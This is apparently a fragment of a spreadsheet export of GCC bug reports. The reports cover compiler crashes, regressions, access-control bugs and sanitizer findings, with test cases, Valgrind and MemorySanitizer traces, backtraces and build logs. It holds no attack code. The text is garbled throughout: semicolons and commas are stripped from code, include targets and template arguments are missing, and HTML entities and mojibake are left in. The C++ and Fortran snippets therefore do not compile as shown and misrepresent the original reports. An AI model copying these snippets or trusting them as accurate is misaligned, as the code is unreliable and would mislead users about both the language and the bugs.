#include 
#include 
struct functor
{
    functor() = default
    functor(const functor }
    void operator()() {}
}
int main()
try
{
    std::function func = functor()
    return 0
}
catch (std::exception&amp;)
{
    std::cout &lt;&lt; catched &lt;&lt; std::endl
}
Valgrind gives me
$ valgrind --tool=memcheck ./a.out
==...== Invalid free() / delete / delete[] / realloc()
==...==    at 0x...: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==...==    by 0x...: std::_Function_base::_Base_manager::_M_destroy(std::_Any_data&amp; std::integral_constant) (functional:1780)
==...==    by 0x...: std::_Function_base::_Base_manager::_M_manager(std::_Any_data&amp; std::_Any_data const&amp; std::_Manager_operation) (functional:1804)
==...==    by 0x...: std::_Function_base::~_Function_base() (functional:1885)
==...==    by 0x...: std::function::function(functor std::enable_if::value) std::function::_Useless&gt;::type) (functional:2292)
On clang/libc++ this behaves as expected.</t>
  </si>
  <si>
    <t>benjamin.kircher</t>
  </si>
  <si>
    <t>GCC-5655</t>
  </si>
  <si>
    <t>Member redeclared within its class definition with a different access specifier is not rejected</t>
  </si>
  <si>
    <t>It seems that the member access control rule 11.1.3 is not
enforced and the corresponding example does not trigger any
error (or warning):
struct S {
  class A
private:
  class A {}
}
Release:
gcc version 3.1 20020209 (experimental)
Environment:
i686-pc-linux-gnu
How-To-Repeat:
The EDG front end emits:
access.cc line 4: warning: redeclaration of class S::A alters its access
    class A {}
          ^
or:
access.cc line 4: error: redeclaration of class S::A alters its access
    class A {}
          ^</t>
  </si>
  <si>
    <t>GCC-12548</t>
  </si>
  <si>
    <t>[3.4 Regression] [non-weak] gcj now failes to compile included example</t>
  </si>
  <si>
    <t>This works w/GCJ 3.3
Attaching test case.
Ã˜yvind
[Output deleted]
org/eclipse/swt/custom/WrappedContent.java:155: warning: unreachable bytecode fr
om 138 to before 141
c:\temp/cc4obaaa.s: Assembler messages:
c:\temp/cc4obaaa.s:1090314: Error: symbol `__GLOBAL__I__ZN3org6apache6regexp31Ch
aracterArrayCharacterIterator6class$E' is already defined</t>
  </si>
  <si>
    <t>GCC-39110</t>
  </si>
  <si>
    <t>[4.4 Regression] Revision 143939  breaks bootstrap on Linux/ia64</t>
  </si>
  <si>
    <t>Revision 143939:
http://gcc.gnu.org/ml/gcc-cvs/2009-02/msg00105.html
caused miscompilation of the fortran compiler on ia64.</t>
  </si>
  <si>
    <t>GCC-82587</t>
  </si>
  <si>
    <t>[PDT] ICE in get_pdt_constructor at fortran/resolve.c:1185</t>
  </si>
  <si>
    <t>Another piece of invalid code :
$ cat z1.f90
program p
   type t(a)
      integer(kind=t()) :: x
   end type
end
$ gfortran-8-20171015 -c z1.f90
f951: internal compiler error: in get_pdt_constructor at fortran/resolve.c:1185
0x6ed6e5 get_pdt_constructor
        ../../gcc/fortran/resolve.c:1185
0x7037be resolve_structure_cons
        ../../gcc/fortran/resolve.c:1247
0x6f31ba resolve_generic_f
        ../../gcc/fortran/resolve.c:2697
0x6f31ba resolve_function
        ../../gcc/fortran/resolve.c:3120
0x6f350a gfc_resolve_expr(gfc_expr*)
        ../../gcc/fortran/resolve.c:6608
0x6916ef gfc_reduce_init_expr(gfc_expr*)
        ../../gcc/fortran/expr.c:2696
0x6940d1 gfc_match_init_expr(gfc_expr**)
        ../../gcc/fortran/expr.c:2744
0x679605 gfc_match_kind_spec(gfc_typespec* bool)
        ../../gcc/fortran/decl.c:2710
0x67faa2 gfc_match_decl_type_spec(gfc_typespec* int)
        ../../gcc/fortran/decl.c:4053
0x68115c gfc_match_data_decl()
        ../../gcc/fortran/decl.c:5605
0x6dbac9 match_word_omp_simd
        ../../gcc/fortran/parse.c:93
0x6df17e match_word
        ../../gcc/fortran/parse.c:376
0x6df17e decode_statement
        ../../gcc/fortran/parse.c:376
0x6e0fb4 next_free
        ../../gcc/fortran/parse.c:1225
0x6e0fb4 next_statement
        ../../gcc/fortran/parse.c:1457
0x6e252d parse_derived
        ../../gcc/fortran/parse.c:3252
0x6e252d parse_spec
        ../../gcc/fortran/parse.c:3792
0x6e4d93 parse_progunit
        ../../gcc/fortran/parse.c:5634
0x6e6354 gfc_parse_file()
        ../../gcc/fortran/parse.c:6174
0x72a6bf gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-20844</t>
  </si>
  <si>
    <t>ADVANCE=specifier in output statement</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
WRITE(6ADVANCE='NO') 0
END</t>
  </si>
  <si>
    <t>GCC-70018</t>
  </si>
  <si>
    <t>[6 Regression] Possible issue around IPO and C++ comdats discovered as pure/const</t>
  </si>
  <si>
    <t>I don't grok gcc internals so I cannot write a terribly well-informed
bug report but GCC 5.3.0 seems to miscompile
https://github.com/sanjoy/comdat-ipo
This was discussed on llvm-dev:
http://lists.llvm.org/pipermail/llvm-dev/2016-February/095833.html and
the thread contains a description of the underlying cause for
LLVM/Clang.
The TLDR is that for C++ inline functions (and other functions with
similar linkage rules) you can override a more-refined function
implementation with a less-refined one at link time and that can
retroactively invalidate earlier transforms where refined in this
case means undefined in fewer situations.
E.g. if we have (this is very similar to the reproducer above minus
some mechanical details):
inline void foo(int* ptr) {
  100 / ptr[0]
}
void bar(int* ptr) {
  *ptr = 40
  foo(ptr):
  *ptr = 50
}
=&gt;
inline void foo(int* ptr) {
  // 100 / ptr[0] removed dead code
}
void bar(int* ptr) {
  *ptr = 40
  foo(ptr):
  *ptr = 50
}
=&gt;
inline void foo(int* ptr) {
  // 100 / ptr[0] removed dead code
}
void bar(int* ptr) {
  // *ptr = 40 dead store since foo does not read memory
  foo(ptr):
  *ptr = 50
}
we've miscompiled if *ptr == 0 on entry to bar and foo is replaced
with the original definition at link time.</t>
  </si>
  <si>
    <t>sanjoy</t>
  </si>
  <si>
    <t>GCC-56798</t>
  </si>
  <si>
    <t>ICE in patch_jump_insn at cfgrtl.c:1238</t>
  </si>
  <si>
    <t>bash-4.1$ /home/slave/build/gcc/bld_gcc/./gcc/xgcc -shared-libgcc -B/home/slave/build/gcc/bld_gcc/./gcc -nostdinc++ -L/home/slave/build/gcc/bld_gcc/x86_64-w64-mingw32/32/libstdc++-v3/src -L/home/slave/build/gcc/bld_gcc/x86_64-w64-mingw32/32/libstdc++-v3/src/.libs -L/home/slave/local/xmingw-4_9-trunk-w64-seh/x86_64-w64-mingw32/lib -L/home/slave/local/xmingw-4_9-trunk-w64-seh/mingw/lib -isystem /home/slave/local/xmingw-4_9-trunk-w64-seh/x86_64-w64-mingw32/include -isystem /home/slave/local/xmingw-4_9-trunk-w64-seh/mingw/include -B/home/slave/local/xmingw-4_9-trunk-w64-seh/x86_64-w64-mingw32/bin/ -B/home/slave/local/xmingw-4_9-trunk-w64-seh/x86_64-w64-mingw32/lib/ -isystem /home/slave/local/xmingw-4_9-trunk-w64-seh/x86_64-w64-mingw32/include -isystem /home/slave/local/xmingw-4_9-trunk-w64-seh/x86_64-w64-mingw32/sys-include -m32 -I/home/slave/build/gcc/gcc-4_9-trunk/libstdc++-v3/../libgcc -I/home/slave/build/gcc/bld_gcc/x86_64-w64-mingw32/32/libstdc++-v3/include/x86_64-w64-mingw32 -I/home/slave/build/gcc/bld_gcc/x86_64-w64-mingw32/32/libstdc++-v3/include -I/home/slave/build/gcc/gcc-4_9-trunk/libstdc++-v3/libsupc++ -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -Wabi -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -frandom-seed=complex_io.lo -g -O2 -m32 -fno-function-sections -fno-data-sections -c /home/slave/build/gcc/gcc-4_9-trunk/libstdc++-v3/src/c++98/complex_io.cc -o complex_io.o
In file included from /home/slave/build/gcc/gcc-4_9-trunk/libstdc++-v3/src/c++98/complex_io.cc:25:0:
/home/slave/build/gcc/bld_gcc/x86_64-w64-mingw32/32/libstdc++-v3/include/complex: In function 'std::basic_ostream _CharT = char _Traits = std::char_traits]':
/home/slave/build/gcc/bld_gcc/x86_64-w64-mingw32/32/libstdc++-v3/include/complex:532:5: internal compiler error: in patch_jump_insn at cfgrtl.c:1238
     }
     ^
0x590a63 patch_jump_insn
        ../../gcc-4_9-trunk/gcc/cfgrtl.c:1238
0x590bb2 redirect_branch_edge
        ../../gcc-4_9-trunk/gcc/cfgrtl.c:1271
0x594542 cfg_layout_redirect_edge_and_branch
        ../../gcc-4_9-trunk/gcc/cfgrtl.c:3901
0x583809 redirect_edge_and_branch(edge_def* basic_block_def*)
        ../../gcc-4_9-trunk/gcc/cfghooks.c:349
0xb4f56d try_forward_edges
        ../../gcc-4_9-trunk/gcc/cfgcleanup.c:585
0xb4f56d try_optimize_cfg
        ../../gcc-4_9-trunk/gcc/cfgcleanup.c:2775
0xb50a94 cleanup_cfg(int)
        ../../gcc-4_9-trunk/gcc/cfgcleanup.c:2976
0xbb657a rest_of_handle_if_conversion
        ../../gcc-4_9-trunk/gcc/ifcvt.c:4455
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>vchou79</t>
  </si>
  <si>
    <t>GCC-264</t>
  </si>
  <si>
    <t>access to private template member functions possible</t>
  </si>
  <si>
    <t>By specialization it is possible to call private template
member functions from outside. This allows to manipulate
private data of the object. As far as I understand this
is not consistent with the encapsulation principle.
For comparison: The code fragment below is rejected by
DEC C++ (which is correct to my mind).
Release:
2.95 2.96 20000529 (experimental)
Environment:
Linux
How-To-Repeat:
class A
{
private:
  template  void g(T t)  {}
  int i
}
template 
void A::g(int t)
{
  i = 1  // through specialization access to private data becomes possible
}
int main()
{
  A a
  a.g(0)         // accepted by compiler!!!!!!
  // a.g(0)   // rejected by compiler: ok
}</t>
  </si>
  <si>
    <t>r.spatschek</t>
  </si>
  <si>
    <t>GCC-26901</t>
  </si>
  <si>
    <t>../../../../../gcc/libjava/classpath/tools/gnu/classpath/tools/AbstractMethodGenerator.java:1: fatal error: unknown encoding: 'roman8'</t>
  </si>
  <si>
    <t>/mnt/gnu/gcc-3.3/objdir/gcc/gcj -B/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.11/
libjava/ -B/mnt/gnu/gcc-3.3/objdir/gcc/ --bootclasspath '../lib' --classpath . -
C -d classes ../../../../../gcc/libjava/classpath/tools/gnu/classpath/tools/*.ja
va ../../../../../gcc/libjava/classpath/tools/gnu/classpath/tools/*/*.java ../..
/../../../gcc/libjava/classpath/tools/gnu/classpath/tools/*/*/*.java
../../../../../gcc/libjava/classpath/tools/gnu/classpath/tools/AbstractMethodGen
erator.java:1: fatal error: unknown encoding: 'roman8'
This might mean that your locale's encoding is not supported
by your system's iconv(3) implementation.  If you aren't trying
to use a particular encoding for your input file try the
'--encoding=UTF-8' option
compilation terminated.
make[4]: *** [tools.zip] Error 1
make[4]: Leaving directory `/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.11/libjav
a/classpath/tools'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.11/libjav
a/classpath'
...</t>
  </si>
  <si>
    <t>GCC-45281</t>
  </si>
  <si>
    <t>performance/ext/pb_ds/priority_queue_text_modify_down_timing.cc fails at compile time</t>
  </si>
  <si>
    <t>Today after a few weeks I ran check-performance and this test didn't compile. I didn't manage to analyze the failure yet and I will be away for a few days of vacations... This is the error:
In file included from /home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/common_type/priority_queue/string_form.hpp:43:0
                 from /home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/performance/priority_queue/timing/modify_test.hpp:43
                 from /home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/performance/ext/pb_ds/priority_queue_text_modify_timing.hpp:41
                 from /home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/performance/ext/pb_ds/priority_queue_text_modify_down_timing.cc:32:
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/native_type/native_priority_queue.hpp: In member function â€˜void __gnu_pbds::test::native_priority_queue::erase(__gnu_pbds::test::native_priority_queue::const_reference) [with Value_Type = std::basic_string bool Vector = true Cmp_Fn = std::less &gt; Allocator = std::allocator __gnu_pbds::test::native_priority_queue::const_reference = const std::basic_string&amp;]â€™:
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/native_type/native_priority_queue.hpp:190:9:   instantiated from â€˜void __gnu_pbds::test::native_priority_queue::modify(__gnu_pbds::test::native_priority_queue::const_reference __gnu_pbds::test::native_priority_queue::const_reference) [with Value_Type = std::basic_string bool Vector = true Cmp_Fn = std::less &gt; Allocator = std::allocator __gnu_pbds::test::native_priority_queue::const_reference = const std::basic_string&amp;]â€™
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/performance/priority_queue/timing/modify_test.hpp:234:17:   instantiated from â€˜void __gnu_pbds::test::detail::push_modify_functor::operator()(std::size_t) [with It = __gnu_cxx::__normal_iterator char&gt;* std::vector char&gt; &gt; &gt; Cntnr = __gnu_pbds::test::native_priority_queue true&gt; std::size_t = long unsigned int]â€™
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/performance/time/timing_test_base.hpp:108:2:   instantiated from â€˜double __gnu_pbds::test::detail::timing_test_base::run_at_resolution(Functor&amp; std::size_t) [with Functor = __gnu_pbds::test::detail::push_modify_functor char&gt;* std::vector char&gt; &gt; &gt; __gnu_pbds::test::native_priority_queue true&gt; __gnu_pbds::test::native_pq_tag&gt; std::size_t = long unsigned int]â€™
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/performance/time/timing_test_base.hpp:77:4:   instantiated from â€˜double __gnu_pbds::test::detail::timing_test_base::operator()(Functor&amp;) [with Functor = __gnu_pbds::test::detail::push_modify_functor char&gt;* std::vector char&gt; &gt; &gt; __gnu_pbds::test::native_priority_queue true&gt; __gnu_pbds::test::native_pq_tag&gt;]â€™
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/performance/priority_queue/timing/modify_test.hpp:316:70:   instantiated from â€˜void __gnu_pbds::test::modify_test::operator()(Cntnr) [with Cntnr = __gnu_pbds::test::native_priority_queue true&gt; It = __gnu_cxx::__normal_iterator char&gt;* std::vector char&gt; &gt; &gt;]â€™
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/performance/ext/pb_ds/priority_queue_text_modify_timing.hpp:85:19:   instantiated from here
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/native_type/native_priority_queue.hpp:148:2: error: cannot bind â€˜__gnu_pbds::test::native_priority_queue true&gt;::base_typeâ€™ lvalue to â€˜std::priority_queue std::vector std::allocator &gt; &gt; std::less &gt; &gt;&amp;&amp;â€™
/scratch/trunk-build/x86_64-unknown-linux-gnu/libstdc++-v3/include/bits/stl_queue.h:459:7: error:   initializing argument 1 of â€˜std::priority_queue&amp; std::priority_queue::operator=(std::priority_queue&amp;&amp;) [with _Tp = std::basic_string _Sequence = std::vector std::allocator &gt; &gt; _Compare = std::less &gt; std::priority_queue = std::priority_queue std::vector std::allocator &gt; &gt; std::less &gt; &gt;]â€™
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/native_type/native_priority_queue.hpp: In member function â€˜void __gnu_pbds::test::native_priority_queue::erase(__gnu_pbds::test::native_priority_queue::const_reference) [with Value_Type = std::basic_string bool Vector = false Cmp_Fn = std::less &gt; Allocator = std::allocator __gnu_pbds::test::native_priority_queue::const_reference = const std::basic_string&amp;]â€™:
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/native_type/native_priority_queue.hpp:190:9:   instantiated from â€˜void __gnu_pbds::test::native_priority_queue::modify(__gnu_pbds::test::native_priority_queue::const_reference __gnu_pbds::test::native_priority_queue::const_reference) [with Value_Type = std::basic_string bool Vector = false Cmp_Fn = std::less &gt; Allocator = std::allocator __gnu_pbds::test::native_priority_queue::const_reference = const std::basic_string&amp;]â€™
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/performance/priority_queue/timing/modify_test.hpp:234:17:   instantiated from â€˜void __gnu_pbds::test::detail::push_modify_functor::operator()(std::size_t) [with It = __gnu_cxx::__normal_iterator char&gt;* std::vector char&gt; &gt; &gt; Cntnr = __gnu_pbds::test::native_priority_queue false&gt; std::size_t = long unsigned int]â€™
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/performance/time/timing_test_base.hpp:108:2:   instantiated from â€˜double __gnu_pbds::test::detail::timing_test_base::run_at_resolution(Functor&amp; std::size_t) [with Functor = __gnu_pbds::test::detail::push_modify_functor char&gt;* std::vector char&gt; &gt; &gt; __gnu_pbds::test::native_priority_queue false&gt; __gnu_pbds::test::native_pq_tag&gt; std::size_t = long unsigned int]â€™
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/performance/time/timing_test_base.hpp:77:4:   instantiated from â€˜double __gnu_pbds::test::detail::timing_test_base::operator()(Functor&amp;) [with Functor = __gnu_pbds::test::detail::push_modify_functor char&gt;* std::vector char&gt; &gt; &gt; __gnu_pbds::test::native_priority_queue false&gt; __gnu_pbds::test::native_pq_tag&gt;]â€™
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/performance/priority_queue/timing/modify_test.hpp:316:70:   instantiated from â€˜void __gnu_pbds::test::modify_test::operator()(Cntnr) [with Cntnr = __gnu_pbds::test::native_priority_queue false&gt; It = __gnu_cxx::__normal_iterator char&gt;* std::vector char&gt; &gt; &gt;]â€™
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/performance/ext/pb_ds/priority_queue_text_modify_timing.hpp:90:19:   instantiated from here
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util/native_type/native_priority_queue.hpp:148:2: error: cannot bind â€˜__gnu_pbds::test::native_priority_queue false&gt;::base_typeâ€™ lvalue to â€˜std::priority_queue std::deque std::allocator &gt; &gt; std::less &gt; &gt;&amp;&amp;â€™
/scratch/trunk-build/x86_64-unknown-linux-gnu/libstdc++-v3/include/bits/stl_queue.h:459:7: error:   initializing argument 1 of â€˜std::priority_queue&amp; std::priority_queue::operator=(std::priority_queue&amp;&amp;) [with _Tp = std::basic_string _Sequence = std::deque std::allocator &gt; &gt; _Compare = std::less &gt; std::priority_queue = std::priority_queue std::deque std::allocator &gt; &gt; std::less &gt; &gt;]â€™
compile error:
/scratch/trunk-build/./gcc/g++ -shared-libgcc -B/scratch/trunk-build/./gcc -nostdinc++ -L/scratch/trunk-build/x86_64-unknown-linux-gnu/libstdc++-v3/src -L/scratch/trunk-build/x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -B/home/paolo/Gcc/svn-dirs/trunk-install/x86_64-unknown-linux-gnu/bin/ -B/home/paolo/Gcc/svn-dirs/trunk-install/x86_64-unknown-linux-gnu/lib/ -isystem /home/paolo/Gcc/svn-dirs/trunk-install/x86_64-unknown-linux-gnu/include -isystem /home/paolo/Gcc/svn-dirs/trunk-install/x86_64-unknown-linux-gnu/sys-include -nostdinc++ -I/scratch/trunk-build/x86_64-unknown-linux-gnu/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/scratch/trunk-build/x86_64-unknown-linux-gnu/libstdc++-v3/include -I/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/libsupc++ -I/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/include/backward -I/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/util -g -O2 -D_GLIBCXX_ASSERT -fmessage-length=0 -ffunction-sections -fdata-sections -g -O2 -D_GNU_SOURCE -std=gnu++0x  -Wl--rpath -Wl/scratch/trunk-build/x86_64-unknown-linux-gnu/libstdc++-v3/../../gcc          -Wl--rpath -Wl/scratch/trunk-build/x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs /home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/performance/ext/pb_ds/priority_queue_text_modify_down_timing.cc ./libtestc++.a -o priority_queue_text_modify_down_timing.exe
performance/ext/pb_ds/priority_queue_text_modify_up_timing.cc</t>
  </si>
  <si>
    <t>GCC-49921</t>
  </si>
  <si>
    <t>[C++0x] Segfault during compilation decltype and operator-&gt;*</t>
  </si>
  <si>
    <t>Code:
#include 
class Local
{
	public:
		void func() {}
}
int main()
{
	Local* l = new Local
	void(Local::*ptr)()
	ptr = 
	decltype((l-&gt;*ptr)) i
	std::cerr &lt;&lt; typeid(i).name &lt;&lt; std::endl
}
Output:
gcc test.cpp -o test -std=c++0x
test.cpp: In function â€˜int main()â€™:
test.cpp:15:22: internal compiler error: Segmenteringsfel
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>fabian.bergmark</t>
  </si>
  <si>
    <t>GCC-15721</t>
  </si>
  <si>
    <t>[4.0 regression] template instantation omits static data members</t>
  </si>
  <si>
    <t>Here is the test program:
template  class gnu_obj_2
{
  public:
    static int my_static
}
template  int gnu_obj_2::my_static = 117
// instantiate templates explicitly so their static members will exist
template class gnu_obj_2 
template class gnu_obj_2 
int main ()
{
  gnu_obj_2   test_int
  gnu_obj_2  test_long
  return 0
}
I compile this program with gcc -S -gstabs+.  Then I look in the generated
assembly code for the static data members gnu_obj_2::my_static and
gnu_obj_2::my_static.
(I don't think the -gstabs+ is important but I just happened to start with this
flag and have kept it all the way till now sigh.  This code originally came
from the gdb test suite gdb.cp/m-static.cc).
The explicit instantiations of gnu_obj_2 and gnu_obj_2 are supposed
to instantiate the static data members along with everything else but they don't.
http://gcc.gnu.org/ml/gcc/2004-05/msg01394.html
The last working gcc was 2004-05-19 01:00:00 UTC and the first broken gcc was
2004-05-19 02:00:00 UTC.  The problem is with this patch:
http://gcc.gnu.org/ml/gcc-patches/2004-05/msg01157.html
IMA repairs: Don't use DECL_ASSEMBLER_NAME for a key in cgraph(take two)
I'll add three attachments: the test program the last good assembly code and
the first bad assembly code.</t>
  </si>
  <si>
    <t>GCC-49879</t>
  </si>
  <si>
    <t>[h8300] ICE in maybe_record_trace_start at dwarf2cfi.c:2439</t>
  </si>
  <si>
    <t>from: 
Using built-in specs.                                                           
COLLECT_GCC=/src/h8300/obj/destdir/bin/h8300-elf-gcc
COLLECT_LTO_WRAPPER=/src/h8300/obj/destdir/libexec/gcc/h8300-elf/4.7.0/lto-wrapper
Target: h8300-elf
Configured with: ../../../external/gpl/gcc/configure
--prefix=/src/h8300/obj/destdir --target=h8300-elf --enable-languages=c
Thread model: single
gcc version 4.7.0 20110726 (experimental) (GCC)
/src/linux/linux/block/elevator.c: In function '__elv_add_request':
/src/linux/linux/block/elevator.c:729:1: internal compiler error: in maybe_record_trace_start at dwarf2cfi.c:2439
Please submit a full bug report 
with preprocessed source if appropriate.
See  for instructions.
might be related to BUG 49874 and BUG 49878</t>
  </si>
  <si>
    <t>lacombar</t>
  </si>
  <si>
    <t>GCC-18160</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE on taking register variable address</t>
  </si>
  <si>
    <t>I know this is invalid but: 
- it produces a warning not an error 
- reliable compilers never crash do they? 
Testcase: 
-------------------------- 
void f(void) 
{ 
        register int x asm(eax) 
        g( 
} 
-------------------------- 
objdir/gcc/xgcc -Bobjdir/gcc -c f.c 
f.c: In function â€˜fâ€™: 
f.c:5: warning: address of register variable â€˜xâ€™ requested 
f.c:5: warning: address of register variable â€˜xâ€™ requested 
f.c:5: internal compiler error: in expand_expr_addr_expr_1 at expr.c:5975 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
Sources checked out as of today morning (about 6 hours ago).</t>
  </si>
  <si>
    <t>alex.neyman</t>
  </si>
  <si>
    <t>GCC-13178</t>
  </si>
  <si>
    <t>[3.3 Regression] Bogus C++ error message referring to operator 1</t>
  </si>
  <si>
    <t>Compiling this test case
template
class C
{
  template operator t() { return (u) this-&gt;i }
  int i
}
int fn (C c) { return C::operator float(c) }
using the compiler in the build tree
gcc/xgcc -Bgcc/ -c ~/foo3.cc
yields this bogus error message:
/home/ian/foo3.cc: In function `int fn(C)':
/home/ian/foo3.cc:7: error: no matching function for call to `C::operator
1(C&amp;)'
There is obviously no ``operator 1''.  Admittedly this program is buggy but the
error message should still be fixed.</t>
  </si>
  <si>
    <t>GCC-4155</t>
  </si>
  <si>
    <t>When compling hash.cc there is an internal compiler error
Release:
unknown
Environment:
cygwin on win2k
PIII 600MHZ 256MB RAM
How-To-Repeat:
just run make on the attached</t>
  </si>
  <si>
    <t>tebeka</t>
  </si>
  <si>
    <t>GCC-60456</t>
  </si>
  <si>
    <t>Uninitialized read in copy_rtx</t>
  </si>
  <si>
    <t>Created attachment 32301
proof
==26761== WARNING: MemorySanitizer: use-of-uninitialized-value
    #0 0x7f2c4996caa9 in copy_rtx(rtx_def*) build-msan/gcc/../../gcc/rtl.c:263:42
    #1 0x7f2c49992513 in process_rtx(rtx_def* int) build-msan/gcc/../../gcc/gensupport.c:535
    #2 0x7f2c49992513 in rtx_handle_directive(int char const*) build-msan/gcc/../../gcc/gensupport.c:2243
    #3 0x7f2c499c4540 in handle_file(void (*)(int char const*)) build-msan/gcc/../../gcc/read-md.c:984
    #4 0x7f2c499c39bd in handle_toplevel_file(void (*)(int char const*)) build-msan/gcc/../../gcc/read-md.c:1010
    #5 0x7f2c499c2176 in read_md_files(int char** bool (*)(char const*) void (*)(int char const*)) build-msan/gcc/../../gcc/read-md.c:1138
    #6 0x7f2c4998a397 in init_rtx_reader_args_cb(int char** bool (*)(char const*)) build-msan/gcc/../../gcc/gensupport.c:2504
    #7 0x7f2c4996017c in main build-msan/gcc/../../gcc/genpreds.c:1369
  Uninitialized value was created by a heap allocation
    #0 0x7f2c4990579d in malloc /code/llvm/build0/../projects/compiler-rt/lib/msan/msan_interceptors.cc:781
    #1 0x7f2c499d4d80 in xmalloc build-msan/build-x86_64-unknown-linux-gnu/libiberty/../../../libiberty/xmalloc.c:147
    #2 0x7f2c499878e9 in ggc_internal_alloc_stat(unsigned long) build-msan/gcc/../../gcc/ggc-none.c:46
    #3 0x7f2c4996b469 in ggc_alloc_rtx_def_stat(unsigned long) build-msan/gcc/../../gcc/ggc.h:257
    #4 0x7f2c4996afdc in rtx_alloc_stat(rtx_code) build-msan/gcc/../../gcc/rtl.c:195:12
    #5 0x7f2c49980e84 in read_rtx_code(char const*) build-msan/gcc/../../gcc/read-rtl.c:1127
    #6 0x7f2c49984c52 in read_nested_rtx() build-msan/gcc/../../gcc/read-rtl.c:1351
    #7 0x7f2c499814fe in read_rtx_code(char const*) build-msan/gcc/../../gcc/read-rtl.c:1156
    #8 0x7f2c49984c52 in read_nested_rtx() build-msan/gcc/../../gcc/read-rtl.c:1351
    #9 0x7f2c49982c7b in read_rtx_code(char const*) build-msan/gcc/../../gcc/read-rtl.c:1190
    #10 0x7f2c4997c44d in read_rtx(char const* rtx_def**) build-msan/gcc/../../gcc/read-rtl.c:1084
    #11 0x7f2c49991d39 in rtx_handle_directive(int char const*) build-msan/gcc/../../gcc/gensupport.c:2241
    #12 0x7f2c499c4540 in handle_file(void (*)(int char const*)) build-msan/gcc/../../gcc/read-md.c:984
    #13 0x7f2c499c39bd in handle_toplevel_file(void (*)(int char const*)) build-msan/gcc/../../gcc/read-md.c:1010
    #14 0x7f2c499c2176 in read_md_files(int char** bool (*)(char const*) void (*)(int char const*)) build-msan/gcc/../../gcc/read-md.c:1138
    #15 0x7f2c4998a397 in init_rtx_reader_args_cb(int char** bool (*)(char const*)) build-msan/gcc/../../gcc/gensupport.c:2504
    #16 0x7f2c4996017c in main build-msan/gcc/../../gcc/genpreds.c:1369
Uninitialized memory comes from this expression on line 263:
  ORIGINAL_REGNO (XEXP (orig 0))
To verify apply the attached patch go the build directory and run
./gcc/build/genpreds -h ../gcc/config/i386/i386.md
The patch fills malloc()-ed memory with a specific pattern and then finds that pattern at the line above.</t>
  </si>
  <si>
    <t>GCC-8181</t>
  </si>
  <si>
    <t>graphviz's program dot fails with ld.so.1: ./dot: fatal: relocation error: file ./dot: symbol __register_frame_info: referenced symbol not found</t>
  </si>
  <si>
    <t>Compile is done via libtool and this is the output:
/bin/sh ../libtool --mode=link gcc  -g -O2 -Wall -Wno-unknown-pragmas -DNDEBUG -DDATE=\`date`\  -o dot  dot.o common/libdotneato.la dotgen/libdot.la common/libdotneato.la ../pathplan/libpathplan.la ../graph/libgraph.la ../cdt/libcdt.la ../gd/libgd.la  -lpng   -lz  -lm
mkdir .libs
gcc -g -O2 -Wall -Wno-unknown-pragmas -DNDEBUG -DDATE=\Mon Sep 23 11:04:20 EST 2002\ -o .libs/dot dot.o  dotgen/.libs/libdot.al common/.libs/libdotneato.al ../pathplan/.libs/libpathplan.so ../graph/.libs/libgraph.so ../cdt/.libs/libcdt.so ../gd/.libs/libgd.so -lpng -lz -lm -R/usr/local/lib/graphviz
creating dot
Release:
gcc version 2.95.3 20010315
Environment:
Solaris 2.8</t>
  </si>
  <si>
    <t>pwu</t>
  </si>
  <si>
    <t>GCC-53180</t>
  </si>
  <si>
    <t>[4.8 Regression] Revision 186378 generates incorrect code for cpu2006 416.gamess</t>
  </si>
  <si>
    <t>Created attachment 27276
testcase
416.gamess benchmark started failing with r186378 due to segfault when running the benchmark. I've tracked down to what appears to be bad code for register spilling. Subroutine with bad code is attatched compile with gfortran -O3 -m64 -mcpu=power7 -funroll-loops -ffast-math.
Snippets from the dump files for the insns of interest:
193r.ira
r186377:
(insn 6636 6631 6639 43 (set (reg:SI 2943 [ D.2378 ])
